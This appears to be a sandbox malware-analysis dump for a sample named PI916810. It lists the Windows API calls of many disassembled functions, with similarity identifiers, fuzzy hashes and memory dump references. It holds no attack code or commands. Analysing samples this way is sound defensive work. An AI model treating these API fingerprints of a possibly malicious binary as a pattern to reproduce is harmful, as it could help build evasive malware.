• Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
• Instruction Fuzzy Hash: 7F711571A04716ABDB14BE79CC91B5FB7A8AF01328F24463FF414E6381E778D9408798
APIs
• _memset.LIBCMT ref: 004C2A31
• GetMenuItemInfoW.USER32(00526890,000000FF,00000000,00000030), ref: 004C2A92
• SetMenuItemInfoW.USER32(00526890,00000004,00000000,00000030), ref: 004C2AC8
• Sleep.KERNEL32(000001F4), ref: 004C2ADA
• GetMenuItemCount.USER32(?), ref: 004C2B1E
• GetMenuItemID.USER32(?,00000000), ref: 004C2B3A
• GetMenuItemID.USER32(?,-00000001), ref: 004C2B64
• GetMenuItemID.USER32(?,?), ref: 004C2BA9
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004C2BEF
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004C2C03
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004C2C24
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
• Opcode ID: cf5716a911369572014f46f548e82bc216cfd167bf3870d8bac97558f460cef2
• Instruction ID: 6f523f80a6cb5a5541d34c42305e97e1ed05eb7c927c3dbac4962d1a4a11aae5
• Opcode Fuzzy Hash: cf5716a911369572014f46f548e82bc216cfd167bf3870d8bac97558f460cef2
• Instruction Fuzzy Hash: BA619378900249AFDB61CF54CA84FBF7BB8EB51304F14046EE84197252E7F9AD05DB25
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004E7214
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004E7217
• GetWindowLongW.USER32(?,000000F0), ref: 004E723B
• _memset.LIBCMT ref: 004E724C
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004E725E
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004E72D6
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: e5297fbb954d32fc2196cb22f4677fc9061719f3ffc0d526f5428656f50c3afe
• Instruction ID: c768c4efa852ab4a00130e6360fa12c476ad94cdf61f0d5d2020da74916164f4
• Opcode Fuzzy Hash: e5297fbb954d32fc2196cb22f4677fc9061719f3ffc0d526f5428656f50c3afe
• Instruction Fuzzy Hash: 43616971900288AFDB20DFA5CC81EEE77F8EF09714F14016AFA14A73A1D774A946DB64
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 004B7135
• SafeArrayAllocData.OLEAUT32(?), ref: 004B718E
• VariantInit.OLEAUT32(?), ref: 004B71A0
• SafeArrayAccessData.OLEAUT32(?,?), ref: 004B71C0
• VariantCopy.OLEAUT32(?,?), ref: 004B7213
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004B7227
• VariantClear.OLEAUT32(?), ref: 004B723C
• SafeArrayDestroyData.OLEAUT32(?), ref: 004B7249
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004B7252
• VariantClear.OLEAUT32(?), ref: 004B7264
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004B726F
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2706829360-0
                                                                                                                                                                            • Opcode ID: f6156cef03df45ed539698df79c2cd06e8c87cb9e407d0aba47ebaa5f9244692
                                                                                                                                                                            • Instruction ID: 97d84616652350c10fcc192799e21aa9821554217e77eb455380d3fc1a7b6cca
                                                                                                                                                                            • Opcode Fuzzy Hash: f6156cef03df45ed539698df79c2cd06e8c87cb9e407d0aba47ebaa5f9244692
                                                                                                                                                                            • Instruction Fuzzy Hash: BC414135A001199FCF04DFA9D884DEEBBB8EF58354F00807AF915AB261DB34A945CBA4
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
                                                                                                                                                                              • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
                                                                                                                                                                            • CoInitialize.OLE32 ref: 004D8718
                                                                                                                                                                            • CoUninitialize.OLE32 ref: 004D8723
                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,004F2BEC,?), ref: 004D8783
                                                                                                                                                                            • IIDFromString.OLE32(?,?), ref: 004D87F6
                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004D8890
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004D88F1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                            • API String ID: 834269672-1287834457
                                                                                                                                                                            • Opcode ID: 154a68ca251684703c98341d82de6d8a68a3e82386352013da2f7ec33f52db19
                                                                                                                                                                            • Instruction ID: ea5dd456d34e47fffbcafbd592b05e0cd928ae615f8db591a29b658f74c47830
                                                                                                                                                                            • Opcode Fuzzy Hash: 154a68ca251684703c98341d82de6d8a68a3e82386352013da2f7ec33f52db19
                                                                                                                                                                            • Instruction Fuzzy Hash: F8618E706083019FD710EF25C858A6BBBE8AF44714F14481FF9859B391DB78ED48CB9A
                                                                                                                                                                            APIs
                                                                                                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 004D5AA6
                                                                                                                                                                            • inet_addr.WSOCK32(?), ref: 004D5AEB
                                                                                                                                                                            • gethostbyname.WSOCK32(?), ref: 004D5AF7
                                                                                                                                                                            • IcmpCreateFile.IPHLPAPI ref: 004D5B05
                                                                                                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004D5B75
                                                                                                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004D5B8B
                                                                                                                                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004D5C00
                                                                                                                                                                            • WSACleanup.WSOCK32 ref: 004D5C06
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                            • String ID: Ping
                                                                                                                                                                            • API String ID: 1028309954-2246546115
                                                                                                                                                                            • Opcode ID: 800c984c9589f3c0a8cc8d6d90efc7e2da8df181788e58b56d77426cccb5aacd
                                                                                                                                                                            • Instruction ID: a1e7983883bc80f984dab0811215a475c7b20a04282ba9fecc179237ab7184de
                                                                                                                                                                            • Opcode Fuzzy Hash: 800c984c9589f3c0a8cc8d6d90efc7e2da8df181788e58b56d77426cccb5aacd
                                                                                                                                                                            • Instruction Fuzzy Hash: 02519C316047009FDB20AF25CC95B2AB7E4EF48710F04892BF956DB3A1DB78EC448B0A
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 004CB73B
                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 004CB7B1
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004CB7BB
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 004CB828
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                            • API String ID: 4194297153-14809454
                                                                                                                                                                            • Opcode ID: 3f4ab331fb3d5457227753aed9b7c1d13abdc0e8503dc110a91c938f138ff7eb
                                                                                                                                                                            • Instruction ID: acfa057b2d60fd5556d2ed82b77b685302114c65d3c133b22179207fc2ffcddf
                                                                                                                                                                            • Opcode Fuzzy Hash: 3f4ab331fb3d5457227753aed9b7c1d13abdc0e8503dc110a91c938f138ff7eb
                                                                                                                                                                            • Instruction Fuzzy Hash: 4C31A639A012049FDB41EF65C886FAEBBB4FF44704F14402FE80197291E7799D46C795
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                              • Part of subcall function 004BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 004BB0E7
                                                                                                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 004B94F6
                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 004B9501
                                                                                                                                                                            • GetParent.USER32 ref: 004B951D
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 004B9520
                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 004B9529
                                                                                                                                                                            • GetParent.USER32(?), ref: 004B9545
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 004B9548
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 1536045017-1403004172
                                                                                                                                                                            • Opcode ID: 91676b3047c2976d96bb6a59b1f17f5f70f7c4ac6f445b39b0d41dd4f16d4ab3
                                                                                                                                                                            • Instruction ID: 8fa847d84389b9272c2330be083e0171a7e3e28a94c7ce81814c17c4360526b8
                                                                                                                                                                            • Opcode Fuzzy Hash: 91676b3047c2976d96bb6a59b1f17f5f70f7c4ac6f445b39b0d41dd4f16d4ab3
                                                                                                                                                                            • Instruction Fuzzy Hash: 4F210670A00244BBCF05AB61CCC5EFEBB75EF45300F10412AF661972E2DB799919DB24
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                              • Part of subcall function 004BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 004BB0E7
                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004B95DF
                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 004B95EA
                                                                                                                                                                            • GetParent.USER32 ref: 004B9606
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 004B9609
                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 004B9612
                                                                                                                                                                            • GetParent.USER32(?), ref: 004B962E
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 004B9631
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 1536045017-1403004172
                                                                                                                                                                            • Opcode ID: bd49c6473d3cfb96557ac352e98864bda792db89178d7942488a7f3d332a65ab
                                                                                                                                                                            • Instruction ID: 4228a12a0ee93e13546b38088c2057527baeeab43d619a99ed52879c764203d2
                                                                                                                                                                            • Opcode Fuzzy Hash: bd49c6473d3cfb96557ac352e98864bda792db89178d7942488a7f3d332a65ab
                                                                                                                                                                            • Instruction Fuzzy Hash: 6B210670A00244BBDF05AB71CCC5EFEBB74EF44300F10402AF511972A2DB79491ADA24
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetParent.USER32 ref: 004B9651
                                                                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 004B9666
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004B9678
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004B96F3
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                            • API String ID: 1704125052-3381328864
                                                                                                                                                                            • Opcode ID: 730c6c0998edf8c26f187d1235748b7bb8b669922ce07f7a310e49840dcaced9
                                                                                                                                                                            • Instruction ID: 57c1b305b4da97ec79bc7955051e60edfbeac5851470de6f13da5429ce2e91e5
                                                                                                                                                                            • Opcode Fuzzy Hash: 730c6c0998edf8c26f187d1235748b7bb8b669922ce07f7a310e49840dcaced9
                                                                                                                                                                            • Instruction Fuzzy Hash: C9113A36248307BAFA012A35DC1BDEB7B9C9F01B24F20002BFA00A40D2FEA95D51466D
                                                                                                                                                                            APIs
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004C419D
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004C41AA
                                                                                                                                                                              • Part of subcall function 004838D8: __woutput_l.LIBCMT ref: 00483931
                                                                                                                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 004C41D4
                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004C41E0
                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 004C41ED
                                                                                                                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 004C420D
                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004C421F
                                                                                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004C422E
                                                                                                                                                                            • LockResource.KERNEL32(?), ref: 004C423A
                                                                                                                                                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 004C429B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1433390588-0
                                                                                                                                                                            • Opcode ID: 8898ad80838c4ea3b97bdc49a1d4bb4d538b2ffdc43884af608a6c2c07f29271
                                                                                                                                                                            • Instruction ID: b60ac38a415b0c305798b4aa15d568b0a795bfb1a88a49de782a8ae49ae5bda0
                                                                                                                                                                            • Opcode Fuzzy Hash: 8898ad80838c4ea3b97bdc49a1d4bb4d538b2ffdc43884af608a6c2c07f29271
                                                                                                                                                                            • Instruction Fuzzy Hash: BB31E07560124AABCB109F60DD99EBF7BACEF48341F00447AF901D6141D738DA12CBA9
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004C1700
                                                                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,004C0778,?,00000001), ref: 004C1714
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 004C171B
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004C0778,?,00000001), ref: 004C172A
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 004C173C
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004C0778,?,00000001), ref: 004C1755
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004C0778,?,00000001), ref: 004C1767
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004C0778,?,00000001), ref: 004C17AC
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,004C0778,?,00000001), ref: 004C17C1
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,004C0778,?,00000001), ref: 004C17CC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2156557900-0
                                                                                                                                                                            • Opcode ID: 37d1de909ba32b4b86353fe7cf238226a1924677fa3664998d85356556b9aed7
                                                                                                                                                                            • Instruction ID: 31a9fa6a45530e5eefcde9f7ea4322c5b7c122120230d68265e907b945b29537
                                                                                                                                                                            • Opcode Fuzzy Hash: 37d1de909ba32b4b86353fe7cf238226a1924677fa3664998d85356556b9aed7
                                                                                                                                                                            • Instruction Fuzzy Hash: 0631D179205248BBDB21DF20DD84F7A7BA9AF6B711F10402AF800CA3B1D7789D498B58
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Variant$ClearInit$_memset
                                                                                                                                                                            • String ID: ,,O$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                            • API String ID: 2862541840-475619936
                                                                                                                                                                            • Opcode ID: 4e99391135172803d5cb3b65de35b328a7b5fce040145d5234cec57f399ca03c
                                                                                                                                                                            • Instruction ID: 7de82d03cf070eb653f71b7e03a37dd11e4e6de2b9e2018b1bf40677c6e9415b
                                                                                                                                                                            • Opcode Fuzzy Hash: 4e99391135172803d5cb3b65de35b328a7b5fce040145d5234cec57f399ca03c
                                                                                                                                                                            • Instruction Fuzzy Hash: 67919B71A00205ABDF24DFA1D864FAFBBB8AF45314F10816BE505EB380D7789D45CBA8
                                                                                                                                                                            APIs
                                                                                                                                                                            • EnumChildWindows.USER32(?,004BAA64), ref: 004BA9A2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ChildEnumWindows
                                                                                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                            • API String ID: 3555792229-1603158881
                                                                                                                                                                            • Opcode ID: 10f9de9fc196986730d5742ef66132e6d8eae375fa3bbf75270bc613d54857dd
                                                                                                                                                                            • Instruction ID: 28e999bfcecf550da90db83135fcb91868afd26471a584d8c24bbc9547d53cc6
                                                                                                                                                                            • Opcode Fuzzy Hash: 10f9de9fc196986730d5742ef66132e6d8eae375fa3bbf75270bc613d54857dd
                                                                                                                                                                            • Instruction Fuzzy Hash: 9D91A870600106EBDB18EF61C481BEEFBB5BF04308F10851BD599A7241DF3869AADBB5
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00462EAE
  • Part of subcall function 00461DB3: GetClientRect.USER32(?,?), ref: 00461DDC
  • Part of subcall function 00461DB3: GetWindowRect.USER32(?,?), ref: 00461E1D
  • Part of subcall function 00461DB3: ScreenToClient.USER32(?,?), ref: 00461E45
• GetDC.USER32 ref: 0049CF82
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0049CF95
• SelectObject.GDI32(00000000,00000000), ref: 0049CFA3
• SelectObject.GDI32(00000000,00000000), ref: 0049CFB8
• ReleaseDC.USER32(?,00000000), ref: 0049CFC0
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0049D04B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: cdca2686e37cb4f4542d284a34e8ecd18be2e42416d4c8dfbb7bf980b8706e99
• Instruction ID: 89c38f6c4f9dc9cd21eef08bf2e498dc078579a4fa4a82cece9db2a3fa25847e
• Opcode Fuzzy Hash: cdca2686e37cb4f4542d284a34e8ecd18be2e42416d4c8dfbb7bf980b8706e99
• Instruction Fuzzy Hash: 4A71E330900204EFCF218F64C984AAB7FB6FF49354F14427BED555A2AAD7398842DB65
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,004EF910), ref: 004D903D
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,004EF910), ref: 004D9071
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 004D91EB
• SysFreeString.OLEAUT32(?), ref: 004D9215
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
